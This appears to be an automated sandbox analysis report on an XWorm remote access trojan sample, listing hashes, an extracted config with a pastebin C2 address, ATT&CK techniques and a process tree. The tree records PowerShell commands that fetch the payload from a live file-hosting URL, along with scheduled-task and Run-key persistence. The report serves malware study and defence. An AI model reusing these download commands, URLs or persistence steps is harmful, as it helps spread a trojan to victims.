xworm | 7743183018de756ca03523c24561a2cb868fc69e63ba01f4ff854cc11c3115ba

Analysis

max time kernel
449s
max time network
450s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
04-12-2024 06:55

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

setup-9035d.exe
Size

76KB
MD5

433edb87db3a82d14ba7d88ba87d3503
SHA1

bb2af0b83d7a55aa2d9ebd5e1d3d6f06f1fecc8c
SHA256

7743183018de756ca03523c24561a2cb868fc69e63ba01f4ff854cc11c3115ba
SHA512

858fe073ff5a015d4a51b8976d1e88dcb23504848fb07cc6f1cc5eeac6de91c615aa028de867f520b7bd59750f6a2633061aec96cf5766c18eda8103e16a0516
SSDEEP

1536:O1e1/zEY3vnxkoig5PBVDVfEHbqZYkcJzR72eP72X4HKzkO7C7ZGhLW:Pr3fxTPLh+bYX497MCO72Y1W

Score

10^/10

xworm discovery execution persistence phishing rat trojan

Malware Config

Extracted

Family

xworm

Attributes

Install_directory
%ProgramData%
install_file
Setup-x9035d.exe
pastebin_url
https://pastebin.com/raw/2zRWZhkX

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/memory/2372-1-0x0000000000080000-0x000000000009A000-memory.dmp	family_xworm
behavioral2/files/0x0007000000023cb3-9.dat	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 5 IoCs

flow	pid	Process
55	640	powershell.exe
57	3188	powershell.exe
59	3188	powershell.exe
274	2640	powershell.exe
275	2640	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
3188	powershell.exe
2640	powershell.exe
640	powershell.exe

Downloads MZ/PE file
A potential corporate email address has been identified in the URL: currency-file@1
phishing

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	setup-9035d.exe

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup-x9035d.lnk	setup-9035d.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup-x9035d.lnk	setup-9035d.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup-x9035d.lnk	setup-9035d.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup-x9035d.lnk	setup-9035d.exe

Executes dropped EXE 6 IoCs

pid	Process
3976	Setup-x9035d.exe
3640	Setup-x9035d.exe
4112	Setup-x9035d.exe
4268	Setup-x9035d.exe
1876	Setup-x9035d.exe
3064	Setup-x9035d.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Setup-x9035d = "C:\\ProgramData\\Setup-x9035d.exe"	setup-9035d.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Setup-x9035d = "C:\\ProgramData\\Setup-x9035d.exe"	setup-9035d.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
87	pastebin.com
88	pastebin.com
89	pastebin.com
366	pastebin.com
367	pastebin.com
21	pastebin.com
22	pastebin.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	ip-api.com
364	ip-api.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4196	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 17 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "162"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133777690927766178"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	chrome.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3012	schtasks.exe
4680	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2372	setup-9035d.exe
640	powershell.exe
640	powershell.exe
3188	powershell.exe
3188	powershell.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe
2372	setup-9035d.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2372	setup-9035d.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs

pid	Process
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2372	setup-9035d.exe
Token: SeDebugPrivilege	2372	setup-9035d.exe
Token: SeDebugPrivilege	3976	Setup-x9035d.exe
Token: SeDebugPrivilege	640	powershell.exe
Token: SeDebugPrivilege	4960	setup-9035d.exe
Token: SeDebugPrivilege	3188	powershell.exe
Token: SeDebugPrivilege	3640	Setup-x9035d.exe
Token: SeDebugPrivilege	3304	setup-9035d.exe
Token: SeDebugPrivilege	4112	Setup-x9035d.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe
Token: SeCreatePagefilePrivilege	856	chrome.exe
Token: SeShutdownPrivilege	856	chrome.exe

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe
856	chrome.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2372	setup-9035d.exe
4596	setup-9035d.exe
404	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2372 wrote to memory of 4680	2372	setup-9035d.exe	95
PID 2372 wrote to memory of 4680	2372	setup-9035d.exe	95
PID 2372 wrote to memory of 4164	2372	setup-9035d.exe	105
PID 2372 wrote to memory of 4164	2372	setup-9035d.exe	105
PID 4164 wrote to memory of 640	4164	CMD.EXE	108
PID 4164 wrote to memory of 640	4164	CMD.EXE	108
PID 4164 wrote to memory of 4960	4164	CMD.EXE	110
PID 4164 wrote to memory of 4960	4164	CMD.EXE	110
PID 4164 wrote to memory of 3188	4164	CMD.EXE	111
PID 4164 wrote to memory of 3188	4164	CMD.EXE	111
PID 4164 wrote to memory of 3304	4164	CMD.EXE	114
PID 4164 wrote to memory of 3304	4164	CMD.EXE	114
PID 856 wrote to memory of 2232	856	chrome.exe	125
PID 856 wrote to memory of 2232	856	chrome.exe	125
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 400	856	chrome.exe	126
PID 856 wrote to memory of 5060	856	chrome.exe	127
PID 856 wrote to memory of 5060	856	chrome.exe	127
PID 856 wrote to memory of 632	856	chrome.exe	128
PID 856 wrote to memory of 632	856	chrome.exe	128
PID 856 wrote to memory of 632	856	chrome.exe	128
PID 856 wrote to memory of 632	856	chrome.exe	128
PID 856 wrote to memory of 632	856	chrome.exe	128
PID 856 wrote to memory of 632	856	chrome.exe	128
PID 856 wrote to memory of 632	856	chrome.exe	128
PID 856 wrote to memory of 632	856	chrome.exe	128
PID 856 wrote to memory of 632	856	chrome.exe	128
PID 856 wrote to memory of 632	856	chrome.exe	128
PID 856 wrote to memory of 632	856	chrome.exe	128
PID 856 wrote to memory of 632	856	chrome.exe	128
PID 856 wrote to memory of 632	856	chrome.exe	128
PID 856 wrote to memory of 632	856	chrome.exe	128
PID 856 wrote to memory of 632	856	chrome.exe	128
PID 856 wrote to memory of 632	856	chrome.exe	128
PID 856 wrote to memory of 632	856	chrome.exe	128
PID 856 wrote to memory of 632	856	chrome.exe	128

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\setup-9035d.exe
"C:\Users\Admin\AppData\Local\Temp\setup-9035d.exe"
1⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2372
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Setup-x9035d" /tr "C:\ProgramData\Setup-x9035d.exe"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4680
- C:\Windows\SYSTEM32\CMD.EXE
  "CMD.EXE"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4164
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest https://download1592.mediafire.com/ab1hecfcfr5gRyDPlNfaDieof_90KSRba7GcfS0kTdNFXxUspsNZ9l-qMoKrBJLMLg_PqPfRYWzg91PS5tszaarlnI8g8AdaFEGHsrhBR7o0Eg8QrwmPPMheHlZHrH4foLj94K7TJX7O54uXIyrlTDYUsWMkxt5_-u9vdpoiNRM/ro71bgdud7s0u8a/setup-9035d.exe -OutFile setup-9035d.exe"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:640
- - C:\Users\Admin\AppData\Local\Temp\setup-9035d.exe
    setup-9035d.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4960
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest https://download1592.mediafire.com/ab1hecfcfr5gRyDPlNfaDieof_90KSRba7GcfS0kTdNFXxUspsNZ9l-qMoKrBJLMLg_PqPfRYWzg91PS5tszaarlnI8g8AdaFEGHsrhBR7o0Eg8QrwmPPMheHlZHrH4foLj94K7TJX7O54uXIyrlTDYUsWMkxt5_-u9vdpoiNRM/ro71bgdud7s0u8a/setup-9035d.exe -OutFile setup-9035d.exe"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3188
- - C:\Users\Admin\AppData\Local\Temp\setup-9035d.exe
    setup-9035d.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3304
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /delete /f /tn "Setup-x9035d"
  2⤵
  PID:3368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4A20.tmp.bat""
  2⤵
  PID:3296
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:4196

C:\ProgramData\Setup-x9035d.exe
C:\ProgramData\Setup-x9035d.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3976

C:\ProgramData\Setup-x9035d.exe
C:\ProgramData\Setup-x9035d.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3640

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:376

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
1⤵
PID:512
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest https://download1592.mediafire.com/ab1hecfcfr5gRyDPlNfaDieof_90KSRba7GcfS0kTdNFXxUspsNZ9l-qMoKrBJLMLg_PqPfRYWzg91PS5tszaarlnI8g8AdaFEGHsrhBR7o0Eg8QrwmPPMheHlZHrH4foLj94K7TJX7O54uXIyrlTDYUsWMkxt5_-u9vdpoiNRM/ro71bgdud7s0u8a/setup-9035d.exe -OutFile setup-9035d.exe"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  PID:2640

C:\ProgramData\Setup-x9035d.exe
C:\ProgramData\Setup-x9035d.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4112

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff84379cc40,0x7ff84379cc4c,0x7ff84379cc58
  2⤵
  PID:2232
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1948,i,16544313730866609439,13619075213927003291,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1944 /prefetch:2
  2⤵
  PID:400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2088,i,16544313730866609439,13619075213927003291,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2096 /prefetch:3
  2⤵
  PID:5060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,16544313730866609439,13619075213927003291,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2368 /prefetch:8
  2⤵
  PID:632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,16544313730866609439,13619075213927003291,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3200 /prefetch:1
  2⤵
  PID:3540
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3236,i,16544313730866609439,13619075213927003291,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3464 /prefetch:1
  2⤵
  PID:4712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4604,i,16544313730866609439,13619075213927003291,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4620 /prefetch:1
  2⤵
  PID:3432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4840,i,16544313730866609439,13619075213927003291,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4864 /prefetch:8
  2⤵
  PID:3092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4836,i,16544313730866609439,13619075213927003291,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4984 /prefetch:8
  2⤵
  PID:2620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4892,i,16544313730866609439,13619075213927003291,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4864 /prefetch:8
  2⤵
  PID:3232
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5340,i,16544313730866609439,13619075213927003291,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5352 /prefetch:8
  2⤵
  PID:3116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5344,i,16544313730866609439,13619075213927003291,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5220 /prefetch:8
  2⤵
  PID:1252
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5368,i,16544313730866609439,13619075213927003291,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4896 /prefetch:8
  2⤵
  PID:1836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5536,i,16544313730866609439,13619075213927003291,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5616 /prefetch:2
  2⤵
  PID:4148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5012,i,16544313730866609439,13619075213927003291,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5108 /prefetch:1
  2⤵
  PID:4944
- C:\Program Files\Google\Chrome\Application\chrome.exe
